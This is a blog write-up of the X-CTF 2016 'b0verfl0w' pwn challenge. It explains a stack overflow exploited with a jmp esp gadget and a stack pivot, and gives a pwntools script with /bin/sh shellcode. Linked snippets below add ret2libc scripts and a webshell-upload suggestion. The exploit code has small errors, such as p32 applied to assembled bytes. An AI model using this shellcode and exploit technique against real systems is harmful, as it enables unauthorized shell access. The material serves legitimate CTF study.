【Writeup】X-CTF Quals 2016_Pwn_b0verfl0w

最新推荐文章于 2023-09-19 21:15:21 发布
最新推荐文章于 2023-09-19 21:15:21 发布
阅读量570 收藏
点赞数
分类专栏: i春秋_Linux pwn入门教程系列 - Writeups 文章标签: Writeup Pwn ROP ret2shellcode Stack Pivot
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_38100569/article/details/100389512
版权

0x01 解题思路

  • 查看文件信息
    在这里插入图片描述
      没有开NX,可以向栈上写入shellcode。防护措施只开了一个Partial RELRO,这意味着每次栈加载的地址会变化。
  • 拖入IDA 32 bits查看
    main函数里只有一个vuln函数
    在这里插入图片描述
      显然存在栈溢出,但是只能输入50个字节,而填充的padding字段就需要0x20+4=36个字节,再加上EIP,一共40个字节,只有10个字节的shellcode基本找不到,所以需要考虑把shellcode放在payload的起始处,然后通过ROP跳转到输入点处执行shellcode。
      在不知道栈的确切地址的情况下,假设把shellcode附在payload的最后,如何获取shellcode地址呢?这里就需要一个简单的gadget:jmp esp。因为函数返回时的ret指令相当于pop eip;jmp eip,因此如果将记录返回后eip的内容替换为jmp esp这个gadget的地址,那么就会执行这个语句,而此时的esp刚好指向addr(jmp esp)的下一个位置,也就是跳转到之后栈上的语句执行,这样把shellcode放在此处就可以了。
      本题需要增加一个环节,也就是一个简单的stack pivot(栈指针劫持),把addr(jmp exp)之后的内存放上sub esp,0x28;jmp esp这两句代码,就可以跳转到输入点执行shellcode了。
  • 使用ROPgadget搜索jmp esp
    在这里插入图片描述
  • 使用pwntools的pwnlib库里的asm/disasm可进行汇编/反汇编
    在这里插入图片描述
    在这里插入图片描述

0x02 EXP

from pwn import *

io = process('./b0verfl0w')

shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"

shellcode += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"

shellcode += "\x0b\xcd\x80"



sub_esp_jmp = asm('sub esp, 0x28;jmp esp')

jmp_esp_addr = 0x08048504

offset = 0x20
payload = shellcode
payload += 'A'*(offset-len(shellcode))
payload += 'BBBB'
payload += p32(jmp_esp_addr)
payload += p32(sub_esp_jmp)

io.sendline(payload)
io.interactive()
BAKUMANSEC
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
ASIS-CTF-Finals-2017 pwn Mary_Morton Writeup
qq_39596232的博客
09-03 630
题目描述: ASIS-CTF-Finals-2017 非常简单的热身pwn 分析思路: 1、首先查看文件的安全信息: tucker@ubuntu:~/xman/pwn$ file Mary_Morton Mary_Morton: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interp...
X-CTF Quals 2016 - b0verfl0w [Stack Pivoting]
ACdream
02-13 893
学习资料: https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/fancy-rop/#stack-pivoting 为什么要使用? (1)栈溢出时,覆盖后剩下的栈空间不够写exp、ROP等溢出利用 (2)开启了PIE,栈地址不固定,没法利用 要求:可以控制EIP或ESP的至少一个,利用gadgets: pop esp...
BUUCTF(pwn)x_ctf_b0verfl0w
半岛铁盒的博客
04-01 386
flag的地址有了 execve() – 叫做执行程序函数 就像Python中的os.system(cmd)这个函数,我们可以用这个函数来执行我们的shell脚本,单独的shell命令,或者是调用其他的程序,我们的execve()这个函数就和Python中的os.system函数类似,可以调用其他程序的执行,执行shell命令,,调用脚本等等功能。 from pwn import* flag=0x401157 payload='a'*(0x110+8)+p64(flag) p=remote('..
[BUUCTF-pwn]——x_ctf_b0verfl0w
Y_peak的博客
03-27 603
[BUUCTF-pwn]——x_ctf_b0verfl0w 很简单的一个ret2libc题型,利用栈溢出,构造循环调用 第一次leek地址,之后就可以构造我们想要的rop链了 exploit from pwn import * from LibcSearcher import * #p = process('./b0verfl0w') p = remote('node3.buuoj.cn',26806) elf = ELF('./b0verfl0w') context.log_level = 'debug
[BUUCTF]PWN——x_ctf_b0verfl0w(汇编代码写shellcode+jump esp指令劫持esp)
mcmuyanga的博客
02-04 1316
x_ctf_b0verfl0w 附件 步骤 例行检查,32位程序,开启了RELRO(不可改写got表) 本地试运行一下程序,看看大概的情况 32位ida载入 fgets可以溢出,但是只可以溢出0x32-0x20-0x4=14字节,由于没有开启nx,首先想到的是shellcode,0x20肯定放不进pwntools生成的shellcode,只能自己手写,但是得想办法劫持esp去执行我们的shellcode 在hit函数中找到了jump esp的gadget 因此我们可以构造这样的栈
BUUCTF(pwn)x_ctf_b0verfl0w [ret2libc类型]
半岛铁盒的博客
04-06 426
是ret2libc类型 from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',25524) elf = ELF('./b0verfl0w') puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] main=0x804850e payload='a'*(0x20+4)+p32(puts_plt) + p32(main) +p32(puts_got) p.s.
空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透1
08-03
《空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透》这篇文章讲述了在Windows环境下针对Discuz! 3.4版本进行渗透测试的过程。本文将深入解析其中涉及的关键知识点,包括authkey的作用、Windows短文件名的安全...
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctfwriteup
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
Codefest'2019 CTF writeup 是一篇关于网络安全竞赛的总结,主要涉及的是在Codefest'19夺旗比赛中的几个挑战解决方案。CTF(Capture The Flag)是一种流行的安全竞赛,参赛者通过解决各种安全相关的谜题来获取“旗帜...
FISTA-master.zip_FISTA-master_FISTA、ISTA_Starting With June_fist
07-15
FISTA My implementation of an Fast Iterative Shrinkage Thresholding Algorithm on MATLAB....The details of the implementation, as well as discussions of the technique can be found in project_writeup.pdf.
x_ctf_b0verfl0w
最新发布
qq_62887641的博客
09-19 104
32位,保护全关,写shellcode栈溢出并且有个hit给出了jmp esp。
x_ctf_b0verfl0ww
z1r0的博客
01-11 1006
x_ctf_b0verfl0ww 查看保护 有溢出但是空间小不可以ret2libc。没开nx看见不有一个hint 有个jmp esp,这是一个好跳板,可以去看一下0day安全这个书,里面讲到了jmp esp的灵活运用。写shellcode进去,然后通过jmp esp 和 sub esp, xx,jmp esp来执行shellcode即可。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name
其它栈溢出技巧
听鬼哥说故事
08-29 5958
其它栈溢出技巧
花式栈溢出技巧----stack pivoting/frame faking
qq_42192672的博客
10-14 1273
学习文献:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic_rop/                   https://www.jianshu.com/p/c53627895330 1.stack pivoting 转移堆  以 X-CTF Quals 2016 - b0verfl0w 为例学习 #若可溢出...
Writeup】i春秋 Linux Pwn 入门教程_CSAW Quals CTF 2017-pilot
BAKUMANSEC - Just Do It
08-21 690
Linux pwn入门教程(2)——shellcode的使用,原理与变形 0x01 解题思路 查看文件信息并试运行 没有开保护,显示有RWX段。shellcode必须在具有R和X属性的内存空间上才能执行; 执行时输出了一个地址0x7ffd426b9ca0; 有用户输入点。 拖入IDA 64bits,F5查看 main 如图所示,红框处分别为输出地址和读取用户输...
(攻防世界)(2016 L-CTF)pwn100
PLpa的博客
07-12 2501
这题也是一个DynELF()的栈溢出题,不过这里是运用了puts函数而不是write函数,所以我们构造的leak函数就要不同些。 拿到题目,我们首先查看一下保护: 可以看到,程序只开启了NX保护。 我们进入IDA看一下程序逻辑,找一找漏洞: 我们找到了puts和read函数,看到了明显的栈溢出漏洞,一般思路就是DynELF函数的利用了: 我们找到我们需要的一些地址,然后开始构造exp: #!...
看雪CTF 2016( 原:CrackMe攻防大赛) 第一题分析
09-06 477
看雪CTF 2016(原:CrackMe攻防大赛) 第一题分析 By:星空.之上(Sendige) 在微信上看到了看雪公众号的文章推送,点进去看看,就看到了这个crackme攻防大赛。我对算法分析比较有兴趣,所以就参与一下,断断续续的研究了应该有5、6个小时(因为手机照相出了问题,昨天一晚上在刷机。。。。⊙﹏⊙b汗)好了,废话就不多说了,分享一下我自己的见解吧,如说的不妥...
JCTF 2014(Misc)
andiao1218的博客
04-13 699
小试身手: 点击下载附件 res/raw/hehe,打开 得到flag 转载于:https://www.cnblogs.com/sch01ar/p/8822448.html
CSAW CTF 2016 PWN quals-warmup
Hvnt3r的博客
03-06 2088
CSAW CTF 2016 PWN quals-warmup 原文链接 先对文件有个大致的了解,是64位ELF文件 ☁ csaw ctf 2016 quals-warmup ls exp.py flag.txt readme.txt warmup ☁ csaw ctf 2016 quals-warmup file warmup warmup: ELF 64-bit LSB exec...
php upload ctf,强网杯CTF防御赛ez_upload Writeup
05-14
首先,我们需要分析题目所提供的代码: ```php <?php error_reporting(0); if ($_FILES["upload"]["error"] > 0) { echo "Error: " . $_FILES["upload"]["error"] . "<br />"; } else { echo "Upload: " . $_FILES["upload"]["name"] . "<br />"; echo "Type: " . $_FILES["upload"]["type"] . "<br />"; echo "Size: " . ($_FILES["upload"]["size"] / 1024) . " Kb<br />"; move_uploaded_file($_FILES["upload"]["tmp_name"], "upload/" . $_FILES["upload"]["name"]); echo "Stored in: " . "upload/" . $_FILES["upload"]["name"]; } ?> ``` 从上述代码中我们可以发现,这是一个文件上传的代码,该代码运行后会将用户上传的文件存储到 `upload` 目录下。 但是,该代码没有对上传的文件类型进行限制,这意味着我们可以上传任何类型的文件,甚至是一些恶意的文件。我们可以尝试上传一些常见的恶意文件,比如 `webshell`。 我们可以在本地创建一个 `webshell.php` 文件,然后上传到服务器上的 `upload` 目录。上传完成后,我们可以访问 `http://xxx.xxx.xxx.xxx/upload/webshell.php` 来执行我们上传的 `webshell`。 最后,我们需要注意的是,该上传脚本没有做任何安全性检查,这意味着我们可以上传任意大小的文件,这可能会影响服务器的性能,甚至导致服务器崩溃。因此,在实际应用中,我们应该对上传的文件大小进行限制,同时对上传的文件类型进行检查,从而确保服务器的安全性。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值